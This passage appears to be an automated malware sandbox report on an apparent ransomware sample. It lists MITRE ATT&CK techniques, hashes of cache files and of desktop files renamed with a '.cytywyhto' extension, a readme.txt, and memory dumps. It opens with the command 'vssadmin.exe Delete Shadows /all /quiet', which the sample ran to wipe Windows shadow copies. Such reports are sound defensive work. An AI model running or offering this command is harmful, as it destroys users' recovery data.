vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8fdf046b84f7d098873d018d0136ad7b

SHA1
99f4e1969b74a950c0e9696af5ed5790ecba4e52

SHA256
143e69cf3bf75887a75276e8053938a4d075589fa0a6cf05194c3ac4f18796db

SHA512
6130be05620da330875fc101881f153ab64dcdfbb52b3b21cedd387b685caae6035223ebb760c7f3a07bad424ace99d4afcd1b224659b9554f4be09a9657032e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e4d046f6fab17d97dd57b1b3b47bf3a4

SHA1
2ca5bde79e5db1825d7ff2df429dfe5f6244fff1

SHA256
6050e544ca2312965d21b123fe07482c83b91f125d6448084954a47a8e7f7ca5

SHA512
d4b63a8f3d3c9a84b25d4938106a8985c544f83997b7ca214c3ea711d23eda35e75995f446c123d7905b237ee9c7beebb737069bd5cb8a1e67fe4d1a7eb5670f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0435ebaf5d90768120ed3e61b12bc3c7

SHA1
6f9dd6e0181a55386a955cf257b2ed1b0e7932d2

SHA256
5387dbb3921e6d5fc0f3c5de54b8fe17640477b3fd5e60a2107c8b323241d1d9

SHA512
d3349420f9b6a77b040e9c2b780a4634c81f0138e1d0e560ced65bd4178bb9070f0144013588e2ba105ab1d323073c9dbc6585ad393e0c269102fba8f98ec3b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1f464ca1767513aa4f3efe78d744d7be

SHA1
157158968a51f29fd9aea27e546bfc9e207b0818

SHA256
3b88a1a881142ba0f8cd959eff6330fcf8ac8dfa5e7297a55144670c56fa8198

SHA512
6319a78c862d06d295ed091c498a83ab413e9b1388419b0fc5321e0c504d46f585fa001681e055d97997f5e8611aea370370d10ccda078bc35c61cc9b6137b81

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e4ffe50534b9033d33e925ed044078f2

SHA1
5fc9cb31abb57c79a449ed7d2c10f1239202855d

SHA256
4be383a31f93b948ef35a149435c88737bd91f4374dc05f5f85c3874f3dcde62

SHA512
5fad5aa80a59858b8fb95e8fc214e78aa602730c9d1eeb5cd9eaa8b5e00356973998dd0d5e6b12a8fab2c72f23139b8f3f66716b32512d9922df87c47f98d4c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2e1bfffd8c8d46de84171ea05d4e2bc2

SHA1
28fadf40ff6ee33590ed24f58cfc4dfe4299eddb

SHA256
7b3ef259d26418706b46ac9ba525ad671cb06e7992cd7b3a6602f209356acd9e

SHA512
12b225d264e89528929ca97ac4ad820960b8f04e757249901670e115dfffa75352614494ab95f2d83a8425ca704679587548af0b1795d0e1dd6eaafe8511f7fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ee8f8d6f04bd0e5d0ac4bf9eeb5df07f

SHA1
c086aee288aea81ff5d9dbf7f4ddcd9389cb501d

SHA256
61d444d83355876fe5d2ae2f5fecd375a75362385ddf245d86ad757eac8106f0

SHA512
c00a8d6d51d52fe33f7703fdf17a4d109dcf39ca3971f8fdc7a9cbea92a5d9f135b96d961f288647fe8150fe965f1be80578b5fa05750b7d0ceb6adcb9d298ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c67e6b0c8fb6d77ad66f348c7bd35a03

SHA1
96413f3a445d211bb08566d37b5db1d17f93ea49

SHA256
fe45b11b8798f1003d7aabf6249f2358d58ddacfb29adcde80ee257fd74828a6

SHA512
44ceccb73a50274290a09871727a60274bd7d1e38cf8a2c98141a0527e67cbe0baf83d14a8d7c4ed784d98b04242fc23c7e32169336a74cf06b8374098863322

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ec3faeed501caca380038f7a4e067a71

SHA1
9b502b7bc9cdd63f532785c7f4c284eec60b8835

SHA256
82cf7a75d74e08b35ae23163639256e984468c18e35cf1f608bf4e5780577392

SHA512
56479b930cdcb8d0746c2329eca3a789e802e35f8fedcd5c90b01233c3870885aa8fbce5f83eef6ecc396de84617d0c5c68905581f13a261d93aa732697bea4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3e9fd55baad3d508e583701032b739da

SHA1
78f40022b9ac1273bd28e20e267769c4021b842d

SHA256
548a320cc9d9d407ee3e450abd174136d8bb6c847ff2582e30b64d66ecf0c333

SHA512
3023e62cf165b2ec359a3ae5f17f7f9d7832a5b4513c45ae04243a0bdf77844225fc719ea42031ca210a6515a21a02750568baca10106f12f9081bff5165d5d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabED6E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEE6E.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\Desktop\ConvertFromUnblock.dxf.cytywyhto

Filesize
503KB

MD5
078c4396aba48f70a715a134a31f8a37

SHA1
ef43063568d0216f2e8f5a259423c4c3e2d3077c

SHA256
c7766f9d9c5b560b7bf9969d05762a2b5a730a7f46776dd7fea8034d6b216ee5

SHA512
5127d49034a74b6869c2aef660370b0030cdb821e5d2ca429edfbbc2ecb6a12fe80bb8bd3e784d4732b433141a2f8a21c3640d558adb45abb8e8ec858a391983

Download Submit
C:\Users\Admin\Desktop\DebugFind.docx.cytywyhto

Filesize
651KB

MD5
811db25f9c43a627d190cde1d3fc8570

SHA1
f7fa0614e55d36be7e47778567547dc5f716ce91

SHA256
64f73f0b0326d3200c0158378fce1aa636fe74bc1ad8fa346062ab93fe904e2d

SHA512
928a502b5ec9e54be6397238a8e1d8f1f69a04ddc8872659af50b23960a308879ad60973fd76cfcc4ce741b8d267e3a20a8e58e05dc9b16387569fe2a638acbf

Download Submit
C:\Users\Admin\Desktop\DisableSkip.rle.cytywyhto

Filesize
770KB

MD5
939f966c23a3c9b4b3eeb1678c3fa4dc

SHA1
c28d04108268a0adc07a1a2d575eee121ca597ce

SHA256
f4fe11bd389612fa36d3ad9727f61548efc6303c718d0f48ba8b81ae575c8ca1

SHA512
2fde479fda6a8be6def649640c68a387861fd20ed344ffd6c99337b1f3bc786af370e1bd6fdb1ffa47704c2746602eb5ae54d0d9085466227704a577a24b7204

Download Submit
C:\Users\Admin\Desktop\EditGroup.gif.cytywyhto

Filesize
326KB

MD5
235e95c2a90bcab3da1a30029f56198a

SHA1
e087395c079d73989c915429697143b73d00b6c4

SHA256
4ac3167df9049f1e9f6dba744f61c9bcd5f38adb68465f9aef63c14e07841091

SHA512
7d8e01f33a334cabf6c580ddb9776154ad61fefd66f2950626f19ace5284eefb0cd70272a1978b17652914ceccec69bbc7e99c816edf33c5a90d3714702b3e10

Download Submit
C:\Users\Admin\Desktop\ExpandTest.xltm.cytywyhto

Filesize
888KB

MD5
6f0bdaad5f55b522081592f67b8a5fdb

SHA1
62722e4ebeb2960e121280883d164184e4527eb8

SHA256
892481e6488a6931a0971a77e23014e19dbbc2a97147ff9b128900eb18b92ea6

SHA512
21b5d0ed0ab8b5fa26a9aa42ee68c1eeb172257a7cdf0125666a40ebf7ae0d506b5c3161d838476c3634a520011080f14f24052229ee4b89da7977b3f0f66e76

Download Submit
C:\Users\Admin\Desktop\ExportProtect.xlt.cytywyhto

Filesize
711KB

MD5
293fd3fb6f5e51b956d6bd1480efb574

SHA1
3beb0412db30bc30fe96837e5a1965886b052271

SHA256
1110f4bcbeb73f47c96dbe9ef8d6e9582faa3afe4d1285e7f219dda52790638f

SHA512
f405348eda3462a2acc6b2212fd55ae23fb9a73cf60c53754a351a71d2aa8544327c88561c26e948068e10380c0aaed46875ffc57682ffb680afe7e268d3f95f

Download Submit
C:\Users\Admin\Desktop\MergeResolve.vsd.cytywyhto

Filesize
563KB

MD5
f9f709c3caabb701526792a8941009ca

SHA1
117c15568c000bfc6932bce2ff1e41a684fe04c5

SHA256
bbfdc9e397566ddb50783430a45179d568a478f4046b815ff48b666620956067

SHA512
38f8c63b626ca6984fef04a8aaaffdd979be0a7d51335b86989fbe52e49da0085b07638ccabef7645d86e5188351df5910f53fad36ffb1a676a28ca5575cf89a

Download Submit
C:\Users\Admin\Desktop\MoveWait.vsdx.cytywyhto

Filesize
355KB

MD5
b7d52f2c7f1eaaa801fb259156ede74c

SHA1
e2a6417afdf65bf23e482c6b083a10c48d7e4ca6

SHA256
271de3ca8f90592b06187fe9ecaa135f524d357691d827f14b7a1815e88a056d

SHA512
4389df2600dda340295e2bf28f0f5dabd61dc89fdccf0c564cd32febef8af298dc7473fad8e295e3eabfc2a3c61182c86b63f2a015385bc33d768ac49f8e43ef

Download Submit
C:\Users\Admin\Desktop\ReadConvertTo.wps.cytywyhto

Filesize
414KB

MD5
0d9c1683b24024ee23e62442797f0f83

SHA1
507f32de62a0bd93ecb899c582285faf6376916c

SHA256
5267e1fae8f5079ebd6a23e599edb9db5fa870e8510f12855050689d10ade95b

SHA512
f85cf369dd80f312186781b26a379eaf030f364f4ff8c81a75d9d10912d836786d8a17a63bdd13bfabd06e837ef01876911ea41259646380ff0e951dc792ddfd

Download Submit
C:\Users\Admin\Desktop\ResolveEnter.dib.cytywyhto

Filesize
533KB

MD5
2d1ba9603b6408539f026a7aff492512

SHA1
3387ed334c575102f8d718b0547ebd59e3fd946c

SHA256
e073122e203e7879f3b5781c48f1f2fd3aaddea1e259826afe52e36344c5e37b

SHA512
dea9a6c7a3834b17479c66d5d4e3b343132bf475ce215f5d3d6d9ac0c480f3387fc2cff0b296b73843cd30cdf40eeec5f23d13260384499782c3110c41f28198

Download Submit
C:\Users\Admin\Desktop\StepMerge.wmv.cytywyhto

Filesize
622KB

MD5
84350988d039383f2a4919d0384c6764

SHA1
26a193d4b887ed5ec8a3757a2b0c1cc394e5b6ee

SHA256
21e3bbc7114aa79300b2356ba01ce25b896d010716592a909d7c6d7c8646f49f

SHA512
018c46c546b723a97e0dc62980a6735cbefa9a8d00d539e02805d1673ef8bec9df14181b83cb87a9f53fb350903290eeca4dd45d6fb17cdbc1cb6eba6da1c034

Download Submit
C:\Users\Admin\Desktop\SubmitLimit.svg.cytywyhto

Filesize
681KB

MD5
f65ab173f235e7fcdfa705db37573026

SHA1
3b5de8522ea5c4b1945d29e77d1a4d925fe7560c

SHA256
ff501bac399151c25dbc9ee75d6a7e596285a441a8b92051cb3ab3274257b01c

SHA512
7136681bdf4a9f83bcbaf04fe7ecaca04d95aece9598200e8d51fc6677c89b93bebe28b12099d20057fb51ca71c52a63cda538c85b13474d4107fa9e0f4a91f9

Download Submit
C:\Users\Admin\Desktop\TraceDeny.pptm.cytywyhto

Filesize
859KB

MD5
298c09c99c41b40cc7c6d07fbc89826e

SHA1
a1614a00a6988dd255671199655980534f7ca15f

SHA256
47f0c5dc9ba5538f343f9e49829a083abc3cfe384e7f4f01d4c99b526ef0eb1d

SHA512
05780f87a9117148120a78835d67c3c4a34b1c4a8fa6934e70ff2a8a6f3be2507a149831d4f5afc0756891b9d3e45f6c1a82ed3705093de2db601b1f7445d0dc

Download Submit
C:\Users\Admin\Desktop\UnprotectPing.tif.cytywyhto

Filesize
385KB

MD5
841d849ce6d9341ce20f1883e836f162

SHA1
463cdb1b92e470353d449e5033a59e6551e49a52

SHA256
4ce24951e370884504123cde4d33d213a8ba5d6951de3a3fadd65a5a7455bf83

SHA512
2b69d3bdb326eb322ac46f4742dcc2086edabb79263a84f9b8c82a34f314497250711dd8a10a915caca1c359cfbc86d498bbdc10f1211b77b19a7da17dbec643

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
2d0e9eed0f83e121105791701de23e37

SHA1
39a7b4edd4a0d718c8ab88031c8c68e1c91dc3ce

SHA256
28e4e8c7f6315073dc9b845c1f4fcd61db2e4e84a77560ded775b46a00589c74

SHA512
6da85718b08c09c034310992b2b046c016d12de913037718d40395dcee222d4123c0d42a19b05c707e5691263018fefbb0459e7d4a6416c47738c78281bb80cb

Download Submit
memory/1140-6-0x0000000000350000-0x0000000000355000-memory.dmp

Filesize
20KB

Download
memory/1140-16-0x0000000000350000-0x0000000000355000-memory.dmp

Filesize
20KB

Download
memory/1824-7-0x00000000002F0000-0x00000000002F1000-memory.dmp

Filesize
4KB

Download
memory/1824-2-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1824-14-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/1824-11-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1824-9-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/1824-13-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/1824-5-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/1824-15-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/1824-4-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1824-3-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1824-0-0x0000000001E00000-0x000000000213D000-memory.dmp

Filesize
3.2MB

Download
memory/1824-1-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1824-17-0x0000000004010000-0x0000000004011000-memory.dmp

Filesize
4KB

Download
memory/1824-803-0x00000000040B0000-0x00000000040B1000-memory.dmp

Filesize
4KB

Download